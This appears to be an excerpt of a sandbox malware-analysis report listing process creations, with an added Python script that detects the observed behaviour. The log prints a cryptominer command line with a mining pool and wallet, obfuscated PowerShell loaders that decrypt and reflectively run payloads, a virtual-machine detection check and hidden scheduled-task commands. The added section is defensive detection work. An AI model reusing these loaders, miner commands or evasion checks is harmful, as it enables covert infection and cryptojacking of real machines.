        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
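The process tree above contains four detection opportunities that do not depend on the sample's hashes: fodhelper.exe spawning a shell (the Fodhelper UAC bypass firing), a logon task created with /rl highest whose action lives under the user's Temp directory, the wmic diskdrive | findstr disk-model check against sandbox/VM strings, and conhost.exe launching explorer.exe with XMRig-style arguments (conhost.exe hosts console I/O and does not start programs; a child like this points at code injected into it). The following is an added example, not part of the Joe Sandbox report or of the sample: it runs those four checks, plus a generic conhost-parent rule, over constructed events modelled on the lines above. Field names (parent, image, cmdline) correspond to ParentImage/Image/CommandLine in Sysmon Event ID 1; the shell set, the two-marker threshold for miner arguments and the path heuristic are the author's choices, and the wallet address is replaced by a placeholder.

```python
import re

# Constructed sample process-creation events, modelled on the process tree listed above.
# They are not captured telemetry; the wallet in --user= is replaced by a placeholder.
EVENTS = [
    {"parent": r"C:\Windows\System32\fodhelper.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": '"cmd.exe"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
                r'/tr "C:\Users\user\AppData\Local\Temp\services64.exe"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\findstr.exe",
     "cmdline": 'findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"'},
    {"parent": r"C:\Windows\System32\conhost.exe",
     "image": r"C:\Windows\explorer.exe",
     "cmdline": r'C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --randomx-mode=auto '
                r'--url=pool.hashvault.pro:80 --user=WALLET_PLACEHOLDER --pass= --cinit-stealth'},
    # Benign controls: a normal explorer launch and an ordinary scheduled task.
    {"parent": r"C:\Windows\System32\userinit.exe",
     "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\Explorer.EXE"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe", "wscript.exe"}
MINER_MARKERS = ("--algo=", "--url=", "--randomx", "--cinit-", "rx/0", "--cpu-max-threads-hint")
VM_DISK_STRINGS = ("qemu harddisk", "vbox harddisk", "virtual hd", "dady harddisk", "wds100t2b0a")


def _name(path):
    """File name of an image path, lower-cased, for comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_fodhelper_child(ev):
    """fodhelper.exe auto-elevates and normally launches nothing; a shell child
    means the ms-settings handler hijack fired and the child runs elevated."""
    return _name(ev["parent"]) == "fodhelper.exe" and _name(ev["image"]) in SHELLS


def rule_schtasks_highest_user_path(ev):
    """Logon task created with /rl highest whose action lives under C:\\Users."""
    c = ev["cmdline"].lower()
    return (_name(ev["image"]) == "schtasks.exe" and "/create" in c
            and "/rl highest" in c and re.search(r'/tr\s+"?[a-z]:\\users\\', c) is not None)


def rule_disk_model_sandbox_check(ev):
    """findstr over disk model names: the wmic diskdrive | findstr sandbox check."""
    c = ev["cmdline"].lower()
    return _name(ev["image"]) == "findstr.exe" and any(s in c for s in VM_DISK_STRINGS)


def rule_miner_args_in_system_binary(ev):
    """A binary under C:\\Windows started with XMRig-style arguments: the miner
    runs under a system image name (here explorer.exe) to blend into process lists."""
    c = ev["cmdline"].lower()
    return (ev["image"].lower().startswith("c:\\windows\\")
            and sum(m in c for m in MINER_MARKERS) >= 2)


def rule_conhost_parent(ev):
    """conhost.exe does not launch programs (WerFault after a crash aside);
    any other child indicates code injected into conhost."""
    return (_name(ev["parent"]) == "conhost.exe"
            and _name(ev["image"]) not in {"conhost.exe", "werfault.exe"})


RULES = (rule_fodhelper_child, rule_schtasks_highest_user_path,
         rule_disk_model_sandbox_check, rule_miner_args_in_system_binary, rule_conhost_parent)


def run_rules(events):
    """Return (rule name, child image name) for every event a rule matches."""
    return [(rule.__name__, _name(ev["image"])) for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for hit in run_rules(EVENTS):
        print(*hit)
```

Run against the constructed events, the four malicious lines produce five hits (explorer.exe trips both the miner-argument and the conhost-parent rule) and the two benign controls produce none. The conhost-parent rule is the broadest; in production it should be tuned per environment, but it is the one that would have caught the sihost64.exe and cmd.exe children listed above as well.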
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[
Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'
S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[C
har](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
